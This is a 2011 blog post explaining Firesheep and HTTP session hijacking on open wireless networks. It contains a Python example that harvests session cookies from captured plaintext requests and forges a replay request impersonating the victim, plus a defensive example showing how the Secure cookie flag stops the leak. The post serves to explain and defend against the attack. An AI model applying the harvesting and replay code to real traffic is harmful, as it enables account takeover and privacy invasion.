Wednesday, February 2, 2011

Firesheep

Encrypting user data is essential, yet some websites choose to protect only the user's password instead of everything that passes over the network. This has left many sites and their users exposed to HTTP session hijacking, in which an attacker on the same open network takes over a logged-in session with a site the victim has visited. The security risks of unprotected wireless networks are nothing new, and a controversial Firefox add-on shows just how easily someone's account can be hijacked. The program is called Firesheep; it was released in October 2010 by Eric Butler to demonstrate the vulnerability of many popular websites, Facebook and Amazon among them.

Firesheep is built on a packet analyzer, a program that captures the data packets being sent over a network. Such programs are commonly used to find and debug problems within a network, but they can also be used to obtain personal information. On an unsecured (open) wireless network, any unencrypted data sent over the air is readable by anyone running a packet analyzer within range. Although sensitive information such as credit card numbers and passwords is generally encrypted (the login form is submitted over HTTPS), the information Firesheep uses to hijack your account is not: once you are logged in, the site drops back to plain HTTP, and the session cookie travels with every request in the clear.

After a person logs on to a website, their username and password are verified and the website sends a cookie to the user's browser. The browser then sends this cookie back with every request to that site, which is how the user stays logged in. Anyone running a packet analyzer on the same network can capture the cookie as it passes by and present it to the site in their own requests. Because the site identifies the session by the cookie alone, not by who is sending it, the hijacker is now treated as the logged-in user, without ever needing the password, until the victim logs out or the session expires. Firesheep lets users "test" this process against a number of websites with an easy-to-use interface.
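The capture-and-replay step described above, written out as an added example (this is not Firesheep's own code). It takes raw HTTP requests as they would appear on an open network, picks out the cookie each site uses for its session, and builds the request a hijacker would send. The host names, cookie names and captured requests are all constructed for the example; real Firesheep ships a per-site "handler" that knows which cookie names matter, which the SESSION_COOKIE_HANDLERS table stands in for here.

```python
"""Added example: harvest session cookies from plaintext HTTP and forge a replay request.

Not Firesheep's code. Hosts, cookie names and the captured traffic below are invented.
"""
from typing import Dict, List, Tuple

# Constructed sample of three plaintext HTTP requests as seen on the wire (not real traffic).
# Only the request line and headers matter; the session cookie 'sid' is a hypothetical name.
CAPTURED_REQUESTS: List[bytes] = [
    b"GET /home.php HTTP/1.1\r\nHost: www.example-social.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nCookie: datr=abc123; sid=9f8e7d6c5b4a; locale=en_US\r\n\r\n",
    b"GET /search?q=firesheep HTTP/1.1\r\nHost: www.example-search.com\r\n"
    b"Cookie: PREF=ID=xyz\r\n\r\n",
    b"POST /login HTTP/1.1\r\nHost: www.example-social.com\r\n"
    b"Content-Length: 0\r\n\r\n",
]

# Hypothetical per-site handlers: which cookie names carry the login session for each host.
SESSION_COOKIE_HANDLERS: Dict[str, List[str]] = {
    "www.example-social.com": ["sid"],
}


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, headers); header names are lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Turn a Cookie header such as 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def harvest_sessions(captured: List[bytes]) -> Dict[str, Dict[str, str]]:
    """Return {host: {cookie_name: value}} for every request carrying a known session cookie.

    Requests to hosts without a handler, or without a Cookie header, are ignored,
    just as Firesheep only lists sites it has a handler for.
    """
    found: Dict[str, Dict[str, str]] = {}
    for raw in captured:
        _, _, headers = parse_request(raw)
        host = headers.get("host", "")
        names = SESSION_COOKIE_HANDLERS.get(host)
        if not names or "cookie" not in headers:
            continue
        jar = parse_cookie_header(headers["cookie"])
        session = {n: jar[n] for n in names if n in jar}
        if session:
            found[host] = session
    return found


def build_replay(host: str, path: str, session: Dict[str, str]) -> bytes:
    """Forge a request presenting the stolen cookie; the server cannot tell it from the victim's."""
    cookie = "; ".join(f"{k}={v}" for k, v in session.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


if __name__ == "__main__":
    for host, session in harvest_sessions(CAPTURED_REQUESTS).items():
        print(host, session)
        print(build_replay(host, "/home.php", session).decode())
```

Only the first request yields anything: the second is for a host with no handler, and the third carries no cookie at all. Note that nothing in the replay depends on the attacker's network position once the cookie is known; being on the same open network is needed only to capture it.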

When Firesheep is run on an open network, any session cookies it recognises are captured and listed in the add-on's sidebar, one entry per account. The hijacker then opens that account by double-clicking the session's entry. Although the program was created to demonstrate the danger of unsecured networks, it can just as easily be used to spy on people at the local Starbucks. Google already serves Gmail over HTTPS by default; since Firesheep's release Facebook has added an HTTPS option, but only as an opt-in setting: users need to go to Account Settings and click "enable secure browsing" in the Account Security pane. Moving pages to HTTPS only closes the hole if the session cookie is also marked Secure, so that the browser never sends it over a plain HTTP request to the same site.
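To show why the Secure attribute matters, here is an added example (not code from Facebook, Google or Firesheep) that applies the browser's rule for attaching cookies to a constructed browsing session: a cookie is sent to any matching host, over any scheme, unless it carries Secure, in which case it goes only over https. The site names, cookie values and visited URLs are invented for the example.

```python
"""Added example: which requests leak the session cookie over plain HTTP.

Not the code of any real site or browser. Hosts, URLs and cookie values are invented.
"""
from dataclasses import dataclass
from typing import List
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    value: str
    domain: str
    secure: bool = False
    http_only: bool = False


def parse_set_cookie(header: str, origin_host: str) -> Cookie:
    """Parse a Set-Cookie header value (subset of RFC 6265: Domain, Secure, HttpOnly)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name, value=value, domain=origin_host.lower())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.http_only = True
        elif key == "domain":
            cookie.domain = val.strip().lstrip(".").lower()
    return cookie


def domain_matches(host: str, cookie_domain: str) -> bool:
    """RFC 6265 domain match: the host equals the cookie domain or is a subdomain of it."""
    host = host.lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def would_send(cookie: Cookie, url: str) -> bool:
    """Browser rule: the domain must match, and a Secure cookie only travels over https."""
    u = urlsplit(url)
    if not domain_matches(u.hostname or "", cookie.domain):
        return False
    if cookie.secure and u.scheme != "https":
        return False
    return True


def plaintext_leaks(cookie: Cookie, urls: List[str]) -> List[str]:
    """URLs in the victim's browsing that would put the cookie on the wire unencrypted."""
    return [u for u in urls if urlsplit(u).scheme == "http" and would_send(cookie, u)]


# Constructed browsing session: the user opted into HTTPS, but one link and the site's
# own static-content host are still plain http://, and one URL is an unrelated site.
VISITED: List[str] = [
    "https://www.example-social.com/home.php",
    "http://www.example-social.com/photo.php?id=1",
    "https://www.example-social.com/messages",
    "http://static.example-social.com/logo.png",
    "http://www.other-site.example/",
]

# Two constructed Set-Cookie headers for the same session: the weak one and the hardened one.
WEAK = "sid=9f8e7d6c5b4a; Domain=.example-social.com; Path=/"
STRONG = "sid=9f8e7d6c5b4a; Domain=.example-social.com; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    for label, header in (("weak", WEAK), ("hardened", STRONG)):
        cookie = parse_set_cookie(header, "www.example-social.com")
        print(label, plaintext_leaks(cookie, VISITED))
```

With the weak header, the two plain-http requests to example-social.com hosts each carry the session cookie, and a single one of them is enough for a sniffer. With Secure set, neither request carries it, so opting into HTTPS pages without flagging the cookie does not by itself defeat Firesheep.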